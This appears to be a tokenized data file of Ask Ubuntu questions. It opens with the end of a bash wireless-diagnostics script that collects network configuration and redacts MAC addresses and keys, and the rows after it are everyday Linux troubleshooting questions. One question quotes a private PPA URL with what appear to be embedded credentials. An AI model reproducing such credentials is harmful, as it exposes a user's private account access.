1..60 } ) p2= $ ( printf ' % 0.1s ' `` - '' { 1..160 } ) format= '' % - $ { f1 } s| % - $ { f2 } s| % - $ { f3 } s| % - $ { f4 } s| % - $ { f5 } s| % - $ { f7 } s| % - $ { f8 } s| % - $ { f6 } s '' head= $ ( printf $ format `` interface & id '' `` type '' `` driver '' `` state '' `` default '' `` speed '' `` support '' `` hw addr '' ) l1= $ ( printf ' % .*so % .*so % .*so % .*so % .*so % .*so % .*so % . *s ' $ f1 $ p1 $ f2 $ p1 $ f3 $ p1 $ f4 $ p1 $ f5 $ p1 $ f7 $ p1 $ f8 $ p1 $ f6 $ p1 ) l2= $ ( printf ' % .*s+ % .*s+ % .*s+ % .*s+ % .*s+ % .*s+ % .*s+ % . *s ' $ f1 $ p2 $ f2 $ p2 $ f3 $ p2 $ f4 $ p2 $ f5 $ p2 $ f7 $ p2 $ f8 $ p2 $ f6 $ p2 ) printf `` $ ( head -1 < < < `` $ nmtool '' ) \n '' nmtool= $ ( tail -n +2 < < < `` $ nmtool '' ) printf -- `` $ l1\n $ head\n $ l1 '' devranges= $ ( printf `` $ ( sed -n '/^- device/ = ' < < < `` $ nmtool '' ) \n $ ( ( $ ( wc -l < < < `` $ nmtool '' ) +1 ) ) '' ) ; prev=0 while read curr ; do if [ $ prev -eq 0 ] ; then prev= $ curr else range= $ ( sed -n `` $ prev , $ ( ( curr - 1 ) ) p '' < < < `` $ nmtool '' ) subrange1= $ ( grep 'freq . * rate . * strength ' < < < `` $ range '' ) subrange2= $ ( egrep '^ ( address|prefix|gateway|dns ) ' < < < `` $ range '' ) id= $ ( grep '^- dev ' < < < `` $ range '' ) ; id= $ { id # * : } ; id= $ { id % -* } type= $ ( grep '^ type ' < < < `` $ range '' ) ; type= $ { type # # * } drvr= $ ( grep '^ driver ' < < < `` $ range '' ) ; drvr= $ { drvr # # * } state= $ ( grep '^ state ' < < < `` $ range '' ) ; state= $ { state # # * } def= $ ( grep '^ default ' < < < `` $ range '' ) ; def= $ { def # # * } hw= $ ( grep '^ hw ' < < < `` $ range '' ) ; hw= $ { hw # # * } speed= $ ( grep '^ speed ' < < < `` $ range '' ) ; speed= $ { speed # # * } wep= $ ( grep '^ wep ' < < < `` $ range '' ) ; wep= $ { wep # # * } ; wep= $ { wep/yes/wep/ } ; wep= $ { wep/no/ } wpa= $ ( grep '^ wpa ' < < < `` $ range '' ) ; wpa= $ { wpa # # * } ; wpa= $ { wpa/yes/wpa/ } ; wpa= $ { wpa/no/ } wpa2= $ ( grep '^ wpa2 ' < < < `` $ range '' ) ; wpa2= $ { wpa2 # # * } ; wpa2= $ { wpa2/yes/wpa2 } ; wpa2= $ { wpa2/no/ } printf `` \n $ format '' `` $ id '' `` $ type '' `` $ drvr '' `` $ state '' `` $ def '' `` $ speed '' `` $ wep $ wpa $ wpa2 '' `` $ hw '' if [ `` $ subrange1 '' ] ; then printf `` \n\n $ subrange1 '' fi if [ `` $ subrange2 '' ] ; then subrange2= $ { subrange2// address/\\n address } printf `` \n $ subrange2 '' fi printf `` \n $ l2 '' prev= $ curr fi done < < < `` $ devranges '' # # networkmanager.state printf `` \n\n $ fmt '' `` networkmanager.state $ fill '' cat /var/lib/networkmanager/networkmanager.state # # networkmanager.conf printf `` \n $ fmt\n '' `` networkmanager.conf $ fill '' grep -v '^ # ' /etc/networkmanager/networkmanager.conf if [ -f /etc/networkmanager/nm-system-settings.conf ] ; then printf `` nm-system-settings.conf ( used up to 10.04 ) : \n '' grep -v '^ # ' /etc/networkmanager/nm-system-settings.conf fi # # nm-connection-profiles printf `` \n $ fmt '' `` nm wifi profiles $ fill '' con_profiles= $ ( sudo grep -ha40 -b4 '^type=802-11-wireless ' /etc/networkmanager/system-connections/* |\ egrep '^id=|^permissions|^autoconnect|^ssid|^mac-address|^bssid|^mtu|ipv4|ipv6|^method|ca-cert ' ) con_profiles= $ ( while read line ; do if [ `` $ ( grep '^id= ' < < < `` $ line '' ) '' ] ; then id= $ { line # # id= } printf `` \n % -20s : `` `` $ id '' else echo -e `` $ line \c '' fi done < < < `` $ con_profiles '' ) con_profiles= $ ( sed -r 's/ ( permissions= [ [ : graph : ] ] * ) / | & / ; s/ autoconnect= [ a-z ] */ | & / ; s/ mac-address= [ [ : graph : ] ] */ | & / s/ bssid= [ [ : graph : ] ] */ | & / ; s/ mtu= [ 0-9 ] */ | & / ; s/ \ [ ( ipv [ 46 ] ) \ ] method ( = [ a-z ] * ) / | \1\2/g s/ [ [ : graph : ] ] *a-cert [ [ : graph : ] ] */ | & / ' < < < `` $ con_profiles '' ) con_profiles= $ ( sed -r 's/ ( \| . * ) ( ssid= [ [ : graph : ] ] * ) /\2\1 / ' < < < `` $ con_profiles '' ) printf `` $ con_profiles\n '' # # interfaces printf `` \n $ fmt\n '' `` interfaces $ fill '' sed -r 's/wpa-psk [ [ : graph : ] ] +/wpa-psk < wpa key removed > / ' /etc/network/interfaces # # resolv.conf printf `` $ fmt\n '' `` resolv.conf $ fill '' grep -v '^ # ' /etc/resolv.conf # # routes & ping printf `` \n $ fmt\n '' `` routes & ping $ fill '' route= $ ( route -n ) printf `` $ route\n '' gw= $ ( awk 'nr==3 { print $ 2 } ' < < < `` $ route '' ) if [ `` $ gw '' ! = `` 0.0.0.0 '' ] ; then ping -nqw4 -c2 `` $ gw '' | sed '/^ping/ d' if [ -e /run/nm-dns-dnsmasq.conf ] ; then dns= $ ( sed -n 's : ^server= : :p ' /run/nm-dns-dnsmasq.conf ) else dns= $ ( sed -n 's : ^nameserver : :p ' /etc/resolv.conf ) fi if [ `` $ dns '' ] ; then while read line ; do ping -nqw2 -c2 `` $ line '' | sed '/^ping/ d' done < < < `` $ dns '' fi fi # # iw reg get printf `` \n $ fmt\n '' `` iw reg get $ fill '' printf `` $ ( locale | sed -n '/ident/ s/lc.*=\ ( . *\ ) / ( region : \1 ) /p ' ) \n '' iw reg get # # iwlist chan printf `` \n $ fmt\n '' `` iwlist chan $ fill '' chan= $ ( iwlist chan ) start= '' '' ; buff1= '' '' ; buff2= '' '' ; flag=0 ; bufflen=0 while read line ; do ch= $ { line # *channel 0 } ; ch= $ { ch # *channel } ; ch= $ { ch % : * } if [ $ { # line } -gt 25 ] ; then if [ -z `` $ start '' ] ; then printf `` $ line\n '' elif [ $ flag -eq 0 ] ; then printf `` $ start % s\n\n $ line\n '' `` - $ buff1 '' else printf `` $ start\n\n $ line\n '' fi elif [ -z `` $ start '' ] ; then start= $ { line/ : / ( } ; start= $ { start/z/z ) } ; count= $ ( ( ch + 1 ) ) elif [ $ ch -eq $ count ] ; then buff1= $ { line # *channel } ; buff1= $ { buff1/ : / ( } ; buff1= $ { buff1/z/z ) } ; count= $ ( ( count + 1 ) ) ; flag=0 elif [ $ flag -eq 0 ] ; then printf `` $ start % s\n '' `` - $ buff1 '' ; start= $ { line/ : / ( } ; start= $ { start/z/z ) } ; count= $ ( ( ch + 1 ) ) ; flag=1 else printf `` $ start\n '' ; start= $ { line/ : / ( } ; start= $ { start/z/z ) } ; count= $ ( ( ch + 1 ) ) fi bufflen= $ { # line } done < < < `` $ chan '' if [ $ bufflen -lt 26 ] ; then printf `` $ start % s\n '' `` - $ buff1 '' ; fi # # iwlist scan printf `` \n $ fmt\n '' `` iwlist scan $ fill '' iwlist= $ ( if [ -t 0 ] ; then sudo iwlist scan || echo `` aquiring of root rights failed . '' elif [ -x /usr/bin/gksudo ] ; then gksudo iwlist scan || echo `` aquiring of root rights failed . '' elif [ -x /usr/bin/kdesudo ] ; then kdesudo iwlist scan || echo `` aquiring of root rights failed . '' else echo `` no way to aquire root rights found . '' fi | grep -v 'ie : unknown : ' ) # filtered out uninteresting lines from the output if [ `` $ iwlist '' ] ; then printf `` $ iwlist\n '' fi # # blacklist printf `` \n $ fmt '' `` blacklist $ fill '' for conffile1 in /etc/modprobe.d/*.conf ; do if [ `` $ ( egrep -v 'alsa-base|blacklist- ( firewire|framebuffer|modem|oss|watchdog ) |fglrx|nvidia|fbdev|bumblebee ' < < < $ conffile1 ) '' ] ; then # filter out default blacklist entries blacklist= $ ( grep '^blacklist ' $ conffile1 |\ egrep -v 'evbug|usb ( kbd|mouse ) |eepro|de4x5|eth1394| snd_|i2c_|prism54|bcm43xx|garmin|asus_acpi|pcspkr|amd76x ' ) if [ `` $ blacklist '' ] ; then printf `` \n [ % s ] \n % s\n '' $ conffile1 `` $ blacklist '' fi fi done # # modinfo printf `` \n $ fmt\n '' `` modinfo $ fill '' modulnames= $ ( grep -v sparse < < < `` $ lsmod '' | awk ' { print $ 1 } ' ) for module in $ modulnames ; do printf `` [ $ module ] \n '' modinfo $ module | egrep -i 'filename|version : |firmware|depends|parm : ' echo done # # udev rules printf `` $ fmt '' `` udev rules $ fill '' egrep '^ ( # . *device| [ ^ # ] | $ ) ' /etc/udev/rules.d/70-persistent-net.rules # # custom files/entries printf `` \n $ fmt\n '' `` custom files/entries $ fill '' # extra modules in /etc/modules if [ $ ( egrep -v '^ # |^ $ |^lp|^rtc|^vhba ' /etc/modules | wc -l ) -eq 0 ] ; then modflag=0 status= '' default '' else modflag=1 status= '' not default '' fi printf `` % -20s : $ status\n '' `` /etc/modules '' # extra entries in /etc/rc.local if [ $ ( egrep -v '^ # |^exit 0|^ $ ' /etc/rc.local | wc -l ) -eq 0 ] ; then rcflag=0 status= '' default '' else rcflag=1 status= '' not default '' fi printf `` % -20s : $ status\n '' `` /etc/rc.local '' # extra files in /etc/modprobe.d conffile2= $ ( egrep -vl '^ # |^black|alias|^ $ ' /etc/modprobe.d/* | cut -d '/ ' -f 4- | egrep -v '^vmw|^alsa|^oss- ' ) if [ -z `` $ conffile2 '' ] ; then modconfflag=0 status= '' default '' else modconfflag=1 status= '' not default '' fi printf `` % -20s : $ status\n '' `` /etc/modprobe.d '' # extra files in /etc/pm/ ( config.d|power.d|sleep.d ) pmflag=0 if [ `` $ ( ls /etc/pm/config.d/ ) '' ] ; then pmflag=1 ; pconflag=1 else pconflag=0 fi if [ `` $ ( ls /etc/pm/power.d/ ) '' ] ; then pmflag=1 ; ppowflag=1 else ppowflag=0 fi sleep_d= $ ( find -l /etc/pm/sleep.d -type f | egrep -v '10_grub-common|10_unattended-upgrades|novatel_3g ' ) if [ `` $ sleep_d '' ] ; then pmflag=1 ; pslflag=1 else pslflag=0 fi if [ $ pmflag -eq 0 ] ; then status= '' default '' else status= '' not default '' fi printf `` % -20s : $ status\n '' `` /etc/pm/ ( cnf|pw|sl ) '' # parsing non-default files/entries if [ $ modflag -eq 1 ] ; then printf `` \n [ /etc/modules ] \n '' egrep -v '^ # |^ $ |^lp|^rtc|^vhba ' /etc/modules fi if [ $ rcflag -eq 1 ] ; then printf `` \n [ /etc/rc.local ] \n '' egrep -v '^ # |^ $ ' /etc/rc.local fi if [ $ modconfflag -eq 1 ] ; then printf `` \n [ /etc/modprobe.d ] \n '' # sed 's/ : / : / ' < < < `` $ conffile2 '' for i in $ conffile2 ; do lines= $ ( egrep -v '^ # |^ $ ' /etc/modprobe.d/ '' $ i '' ) if [ $ ( wc -l < < < `` $ lines '' ) -lt 2 ] ; then printf `` % -18s : % s\n '' `` $ i '' `` $ lines '' else printf `` % -18s : `` `` $ i '' sed -n '1 p ; 2 , $ s/ . */ & /p ' < < < `` $ lines '' fi done fi if [ $ pmflag -eq 1 ] ; then # /etc/pm/config.d/* if [ $ pconflag -eq 1 ] ; then for pmconfig in /etc/pm/config.d/* ; do if [ -x `` $ pmconfig '' ] ; then printf `` \n [ $ pmconfig ] [ executable ] \n '' else printf `` \n [ $ pmconfig ] \n '' fi cat `` $ pmconfig '' done fi # /etc/pm/power.d/* if [ $ ppowflag -eq 1 ] ; then for pmpower in /etc/pm/power.d/* ; do if [ -x `` $ pmpower '' ] ; then printf `` \n [ $ pmpower ] [ executable ] \n '' else printf `` \n [ $ pmpower ] \n '' fi cat `` $ pmpower '' done fi # /etc/pm/sleep.d/* if [ $ pslflag -eq 1 ] ; then for pmsleep in $ sleep_d ; do if [ -x `` $ pmsleep '' ] ; then printf `` \n [ $ pmsleep ] [ executable ] \n '' else printf `` \n [ $ pmsleep ] \n '' fi cat `` $ pmsleep '' done fi fi # # kernel boot line printf `` \n $ fmt\n '' `` kernel boot line $ fill '' cat /proc/cmdline # # dmesg printf `` \n $ fmt\n '' `` dmesg $ fill '' dmesg | egrep `` [ [ : punct : ] ] $ { modmatches } [ [ : punct : ] ] |net|ra [ 0-4 ] |wmi '' printf `` \n\t======== done ========\n\n '' exec 1 > & 3 3 > & - exec 2 > & 4 4 > & - # filter mac ids of interfaces mac_filter_ifaces= $ ( sed -r '/name= '' / ! d ; s/.* ( ( [ [ : alnum : ] ] { 2 } : ) { 5 } [ [ : alnum : ] ] { 2 } ) .*name= '' ( . * ) '' /s\/\1\/\ < mac \3\ > \/i/ ' /etc/udev/rules.d/70-persistent-net.rules ) # filter mac ids from iwlist scan mac_filter_iwlist= $ ( sed -rn '/cell / p ; /essid : '' / p ' < < < `` $ iwlist '' | sed -r '/cell / n ; { s/ . * cell ( [ [ : digit : ] ] { 2 } ) .* ( ( [ [ : alnum : ] ] { 2 } : ) { 5 } [ [ : alnum : ] ] { 2 } ) .*essid : '' ( . * ) '' /s\/\2\/\ < mac c-\1 \4\ > \/i/ } ' ) # filter mac ids from nm-tool cache mac_filter_nmtool= $ ( str_prev= '' '' ; loop=1 sed -rn '/ , ( ( [ [ : alnum : ] ] { 2 } : ) { 5 } [ [ : alnum : ] ] { 2 } ) , / p ' < < < `` $ nmtool '' | sort |\ sed -r 's/ * ( [ [ : graph : ] ] . * ) : . * ( ( [ [ : alnum : ] ] { 2 } : ) { 5 } [ [ : alnum : ] ] { 2 } ) , . */s\/\2\/\ < mac \1\ > \/i/ ' |\ while read line ; do if [ `` $ ( echo $ line | cut -d `` `` -f 2 ) '' = `` $ str_prev '' ] ; then let loop=loop+1 else loop=1 fi sed `` s/\ ( . *mac \ ) \ ( . *\ ) \ ( > .\ ) /\1c-na \2 $ loop\3/ '' < < < `` $ line '' str_prev= $ ( echo `` $ line '' | cut -d `` `` -f 2 ) done ) # original filter for leftover mac ids mac_filter_general='s/ ( [ [ : alnum : ] ] [ [ : alnum : ] ] : ) { 5 } [ [ : alnum : ] ] [ [ : alnum : ] ] / < mac id removed > /' results= $ ( sed -r `` $ mac_filter_ifaces '' $ filebase.tmp ) results= $ ( sed -r `` $ mac_filter_iwlist '' < < < `` $ results '' ) results= $ ( sed -r `` $ mac_filter_nmtool '' < < < `` $ results '' ) sed -r `` $ mac_filter_general '' < < < `` $ results '' > $ filebase.txt rm $ filebase.tmp line= $ ( printf `` % 0.1s '' `` # '' { 1..72 } ) if [ $ ( stat -c % s $ filebase.txt ) -gt 19968 ] ; then tar -czf $ filebase.tar.gz $ filebase.txt rm -f $ filebase.txt filename= '' $ filebase.tar.gz '' else filename= '' $ filebase.txt '' fi msg= '' done ! all results saved in - file name : \t\ '' $ filename\ '' \n\t\t directory : \t\ '' $ ( pwd ) \ '' please upload the above file or its contents where you are seeking help . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- note : although we have taken full precaution to filter out all sensitive information , it is recommended to take a look at the file yourself to be double sure that it contains no sensitive data . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- '' printf `` \n\n $ line\n\n $ msg\n\n $ line\n\n\n\n ''
516904	how do i disable desktop icons ? ( no nautilus in gconf-editor )	i switched my file manager from nautilus to nemo . i installed nemo and changed in the files /usr/share/applicatons/nautilus-home.desktop and nautilus-folder-handler.desktop to exec=nemo with nemo there appeared the icons for devices , homefolder and trashbin on the desktop and i want to remove them . i tried to disable them in the gconf-editor , but there is no `` nautilus '' under `` apps '' , nor did i find any `` show desktop '' option . desktop icons are also disabled via gnome-tweak-tool . what else could i try ? these icons are really ruining my desktop . ps : i am using ubuntu gnome 14.04
516905	school tool in software center	is school tool student managing software still in the software center for the 14.04 lts update ?
516907	ubuntu 14 mount cdrom	i am trying to mount a cdrom with ubuntu 14 . i have read a lot of guides now and none of them work . here is my /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=a65fb62d-3963-421c-800f-ab8f31ae8ce8 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=b93b-e789 /boot/efi vfat defaults 0 1 # swap was on /dev/sda3 during installation uuid=51c0ac58-9c53-48b8-add2-95593c6a1f93 none swap sw 0 0 and here is the results from sudo ls /dev/sr* : /dev/sr0 and here is the results of sudo lshw -c disk : *-disk description : ata disk product : toshiba mk5076gs vendor : toshiba physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : gs00 serial : 52tbt2npt size : 465gib ( 500gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=44291ab4-bda0-4b1c-bda8-00ecf4172451 sectorsize=512 *-cdrom description : dvd-ram writer product : dvdram gt50n vendor : hp physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : mp01 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical id : 0 logical name : /dev/cdrom will someone tell me how to mount my cdrom with that information ? thanks in advance .
516908	how to tunnel all traffic through openconnect	i need to connect through cisco vpn : anyconnect . i found few articles ( example ) describing how to do that using openconnect and network-manager-openconnect . i installed both , configured the vpn connection , and it seem to work . the problem is , that when i surf to `` what is my ip '' service , i see the old ip instead of the one provided by the vpn . when i try to connect using other vpn ( openvpn ) to other server , it just works as expected . does anyone know what can i read\do in order to solve the problem ? i want my public ip address to be provided by the vpn . thanks .
516910	how to make things transparent	how can i make the right-click menu at desktop semi-transparent . and when you click on wireless , bluetooth , volume , and calender i want to make them semi-transparent too .
516911	no `` default '' folder is displayed in passwords & keyrings	recently clean installed ubuntu 14.04 lts 64bit in my many and varied attempts to disable the call for `` enter password to unlock . . . '' i believe i may have damaged the keyring . in comparing the contents of a prior installation i note that there is no default folder . how do i refresh the keyring software ?
516912	excludes specific files from all subdirectories when creating a zip file	i want to exclude all .zip files in all subdirectories of the parent folder i 'm zipping but i does n't work . i have check the man zip pages , this and this questions without success . i have tried : zip -q -r file.zip * -x \*.zip zip -q -r file.zip * -x\*.zip zip -q -r file.zip * -x */\.zip zip -q -r file.zip * -x \*.zip zip -q -r file.zip * -x \*.zip\* zip -q -r file.zip * -x*.zip and i still get all zip files included ( except the one in the parent folder generated with this command before ) . edit : the problem was that i already had a file.zip in the folder which included some zip files . the zip command updates instead of creates a new compressed file if the file it attempts to create already exist , even if you do n't indicate the -u option .
516917	using skype 4.3 in ubuntu 14.04	i am trying to install and use skype 4.3 in ubuntu 14.04 ( i upgraded both recently ) . i kept gettign the `` skype ca n't connect '' error so i followed the instructions here to the letter : how to install skype 4.3 ? this works for the first skype use , but when i quit skype and run it again , i get the same ( 4.2 ) screen with the same `` skype ca n't connect '' error . i can bypass the error by deleting my .skype directory , but i have to do this prior to every single skype run . any ideas what could be causing this ? i do n't understand why a 4.2 error message window would show up anymore . i purged 4.2 using apt-get autoremove and apt-get purge and so forth .
516918	gpg creation but no progress bar	is there no longer a progress bar or some indecator when you create a gpg key in the passwords and keys app ? i wasnt sure it was doing anything until later my new keys were there . should this be reported as a bug ?
516921	`` su '' or `` whoami '' not working	i am connected to an ubuntu 14 via ssh with user `` nuri '' . i am trying to change the user with `` su '' command and no success . below i enter the password for deneme2 correctly and check whoami . afterwards i enter a wrong password . i am new at ubuntu . is this supposed to behave like this since i am connected with ssh or something amiss ? nuri @ xxx : ~ $ whoami nuri nuri @ xxx : ~ $ su deneme2 password : nuri @ xxx : ~ $ whoami nuri nuri @ xxx : ~ $ su deneme2 password : su : authentication failure
516922	deckset app alternative	mac osx have a good app called deckset http : //decksetapp.com/ . this app make slides from markdown text ... . someone know an alternative for ubuntu ?
516925	how do i install ubuntu on a 2gb ( no software ) pc ?	i would like to have a detailed video on how to install ubuntu i have the file downloading and this is my 7th time trying to install this software , i would also like to know how to use my usb to install rather than a cd/dvd thanks for you 're time . : )
516928	upgrade wubi installed ubuntu 12.04 lts to 14.04 lts	i installed ubuntu 12.04 lts into windows xp using wubi.exe . update manager tells me an upgrade to 14.04 is available , and the manager has an `` upgrade '' button . if i click that , will it upgrade my wubi-installed ubuntu in windows and leave windows intact , or will it install the upgrade on top of windows , thereby , eliminating windows ? i want to keep things just as they are except have ubuntu 14.04 lts instead of 12.04 lts . would it be better for me to uninstall 12.04 and do a fresh install using wubi.exe ( 14.04 ) ?
516929	android apps in ubuntu ?	i use ubuntu on a netbook and am looking for a way to run reasonably basic android apps . the only ways to do that i 've seen are to either run the emulator from the sdk or a vm , but those are n't really great options for people like me on underpowered computers . what i was wondering is if anyone here knew of an alternative to this setup . all i really need is something capable of interpreting android apps in desktop linux and spoofing any information like location or accelerometer data ( so no playing games or even 3d work ) . it could be in development ( just so long as i can follow along ) , i 'm just hoping it exists .
516933	windows 8 can not boot after installation of ubuntu 14.04	after installation of ubuntu 14.04 , my windows 8.1 fails to start and shows oxc000000001 , i used boot repair system wich fixed my ubuntu and it is working now but windows 8.1 is not loading : ( , please find the report from boot repair http : //paste.ubuntu.com/8163594/ please help me and thanks a lot for your help
516934	ubuntu server in vbox hangs when adding a line to fstab to mount a usb drobo for owncloud	the basics : hardware running ubuntu 14.04 lts ( kubuntu ) w/ 6gigs ram in old optiplex 760 sff . drobo 4 usb2.0 w/8tbs vbox 4.3.14 r95030 i have managed to get ubuntu server 32bit running in vbox for owncloud 7.0 w/ssl enabled . ( all my virtual machines run from the drobo . all data is stored there . ) my problem is with a shared folder for the owncloud/data that also resides in the drobo . everything works fine as long as i mount the share manually with `` mount '' . i use the line : mount -t vboxsf share /mnt/drobo/share i am trying to get it to mount thru fstab to no avail my fstab code : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/msd -- base -- 32 -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=649e228c-4722-430b-b3eb-7fdaad6b233c /boot ext2 defaults 0 2 # /dev/mapper/msd -- base -- 32 -- vg-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # custom by msd # < name_of_share > /path/to/mountpoint vboxsf < options > 0 0 share /mnt/drobo/share vboxsf auto 0 0 the boot hangs right after the line : starting enable remaining boot-time encrypted block devices [ ok ] screen capture seems i can not add images yet ) if i comment out the line in fstab and manually mount it , then boots/works perfectly . i added vboxvfs & vboxadd to /etc/modules too . yes , the shared folder has been added to the machine . no , i do n't have hardware problems/needs to upgrade as it 's just a testing platform . any advice is much appreciated . thanks .
516937	how do i add to `` system software sources '' ?	while trying to install fluendo on my acer c720 running 12.04 , i was told to add this to my system software sources : deb https : //mjcohen:1j7knsnnsrdwh7ptgc88 @ private-ppa.launchpad.net/commercial-ppa-uploaders/fluendo-dvd/ubuntu precise main how do i do this ? this is on an acer c720 running 12.04 .
516940	how to run ubuntu on android ?	i was on the canonical website and i clicked on products , upon clicking on that i saw under ubuntu there was a picture of ubuntu on a phone and tablet http : //www.canonical.com/products as seen here . any ideas ?
516946	configuring multiple monitors to use custom edids	a few months ago , i purchased a korean 1440p monitor - the x-star dp2710 led . out of the box , it does not work correctly with ubuntu , which detects a corrupted edid over the dvi cable , and refuses to output the correct 1440p resolution . because this monitor does not come with a built-in scaler , this results in the monitor ignoring ubuntu 's output altogether - instead showing a multi-color test pattern . i fixed this by placing the following in my xorg.conf : section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` customedid '' `` dfp-0 : /etc/x11/edid-shimian.bin '' subsection `` display '' depth 24 endsubsection endsection and then of course , at the given path , i 've placed a file called edid-shimian.bin , containing an edid that allows the monitor to display 1440p . the experience of using this monitor is so glorious ( you really need to try it out ) that i 've decided to buy two more to use with this machine , driven by a nvidia gtx 760 . however , the monitor requires a dual-link dvi connection , and that card only offers two , so the third monitor is instead the dp2710 multi variant , which allows the use of an hdmi connection . they 've both arrived today and my work-around does n't seem to work for them . the main monitor still works , but the second dvi monitor does the test pattern , and the hdmi monitor is capped at 1080p . ( i dual boot with windows and was able to get all three monitors to show 1440p there . ) my plan is to somehow apply the same xorg.conf option to the other two monitors , but i 'm not sure of how to manipulate xorg.conf to make that happen . suggestions ?
516947	how to lock ubuntu device orientation in portrait or landscape from user input ?	i am working on a reader app to be used on ubuntu-touch . when reading books from the app it would be a helpful feature to lock the orientation in either portrait or landscape . this would be useful when reading in bed sideways . i 've tried to use automaticorientation = false or true , however , the sdk currently locks the orientation in portrait when set to false . is there a way to lock the orientation of the device screen in one or the other and have it stay locked ? thanks
516948	bootable usb ubuntu	i see that this has been asked around here before . but not only are the answers over a year out of date , they all point to a windows installer that is known to have a virus . i know this for a fact now because i just downloaded it . it passed two scans and failed on the third . so , it indeed is virus infected . that would be the one from peninstaller.com . i think that 's pretty messed up that everyone is still pushing that thing when even their own site says it 's known to be infected . how stupid is that ? ! anyway ... i have the ubuntu iso . but i have it on a machine with no cd burner . i really need to use it to make a usb drive bootable . does anyone have any ideas ?
516953	wifi regularly fails on high traffic	my fritz ! wlan usb stick n ( connected to a fritz ! box 6360 cable ) seems to kill the wifi connection on high traffic loads - i ca n't even do an apt-get upgrade , because the network collapses in the middle of the process . as long as i am just browsing everything is fine , but as soon as a certain ( unknown ) amount of traffic passes through , it seems that the system can not handle it and then suddenly can not find the wifi stick anymore . then it seems to recognize the stick again and tries to connect to my wifi ( if you read the log : winternet , not stenzel_at_home ) , but never successfully establishes a connection until the network-manager prompts for a password ( which i do not even have to enter , because it 's saved and preinserted ) . sometimes even after providing the password the system wo n't connect to the wifi - usually turning wifi off and on again solves the problem , but that 's not an acceptable solution if you have to do it every ~15 minutes . i posted an excerpt of the network-manager parts of my syslog on pastebin here - the first part is just a few minutes before i executed apt-get update & & apt-get -y dist-upgrade . then , after two minutes or so just while downloading a kernel package the network failed . this happens really often and i do n't know where to search or what to do . i know my motherboard has usb problems , but those are bound to certain ports that i do not use ( but yes , i have triplechecked every port again , just to go sure ) . this is a windows 7 dual boot machine and windows never loses the connection , so the hardware actually has to be ok up to that point . has anybody got an idea what to do or at least what the problem is ? system information : ubuntu 12.04.4 with gnome-shell 3.4.1 up and usually running fine . [ 00:44:31 ] root @ l01bu : ~ # uname -r 3.8.0-42-generic [ 00:44:33 ] root @ l01bu : ~ # uname -v # 62~precise1-ubuntu smp wed jun 4 22:04:18 utc 2014 [ 00:44:34 ] root @ l01bu : ~ # uname -p x86_64 [ 00:44:36 ] root @ l01bu : ~ # dpkg -l |grep network-manager ii network-manager 0.9.4.0-0ubuntu4.4.1 network management framework ( daemon and userspace tools ) ii network-manager-gnome 0.9.4.1-0ubuntu2.3 network management framework ( gnome frontend )
516956	is window opacity for mono forms supported ?	i am developing a multiplatform program using mono and it requires form opacity support . basically the ability to make a window semi-transparent . this works fine in windows by setting the window.form.opacity property to say 0.5 . in ubuntu 14.04 however it does not work out-of-the-box . i think i 'm running unity and compiz , whatever came with the default ubuntu setup . according to the mono faq , this should be supported : how can i make my windows alpha blended ? ( transparent ) monoâs winform implementation supports transparency on its windows as long as the underlying windowing system has support for it . for unix/x11 users this means that they must have the composite extension enabled on their server , and they must be running a compositing manager , like xcompmgr . the gentoo linux wiki has a good description on how to setup the xorg server for transparency support . http : //www.mono-project.com/docs/faq/winforms/ the link they point to is dead . i 'm new to linux and not quite sure i understand all the parts involved in getting a compositing window manager up and running . besides , do n't i already have one ( compiz ? ) what should i try to get my winform opacity to work ? edit : my test program is basically a form with a scrollbar ( goes from 0 to 100 ) that has an event handler on change to set the form 's opacity based on the scrollbar 's value . this is the meat of it : private void trackbar1_scroll ( object sender , eventargs e ) { double opacity = ( ( double ) trackbar1.value ) / 100 ; this.opacity = opacity ; } works great in windows .
516958	apache2 wont start	i had my server up and running fine until my laptop got unplugged and died while i was away . now when i try to restart apache2 using `sudo apache2 -k restart ' i get this error : [ wed aug 27 20:16:27.504121 2014 ] [ core : warn ] [ pid 6953 ] ah00111 : config variable $ { apache_lock_dir } is not defined [ wed aug 27 20:16:27.504212 2014 ] [ core : warn ] [ pid 6953 ] ah00111 : config variable $ { apache_pid_file } is not defined [ wed aug 27 20:16:27.504240 2014 ] [ core : warn ] [ pid 6953 ] ah00111 : config variable $ { apache_run_user } is not defined [ wed aug 27 20:16:27.504255 2014 ] [ core : warn ] [ pid 6953 ] ah00111 : config variable $ { apache_run_group } is not defined [ wed aug 27 20:16:27.504277 2014 ] [ core : warn ] [ pid 6953 ] ah00111 : config variable $ { apache_log_dir } is not defined [ wed aug 27 20:16:27.507253 2014 ] [ core : warn ] [ pid 6953 : tid 3074841216 ] ah00111 : config variable $ { apache_log_dir } is not defined [ wed aug 27 20:16:27.507466 2014 ] [ core : warn ] [ pid 6953 : tid 3074841216 ] ah00111 : config variable $ { apache_log_dir } is not defined [ wed aug 27 20:16:27.507491 2014 ] [ core : warn ] [ pid 6953 : tid 3074841216 ] ah00111 : config variable $ { apache_log_dir } is not defined ah00526 : syntax error on line 74 of /etc/apache2/apache2.conf : invalid mutex directory in argument file : $ { apache_lock_dir } i didnt change anything to cause all this as it worked fine with no errors until i noticed one day that my server wasnt 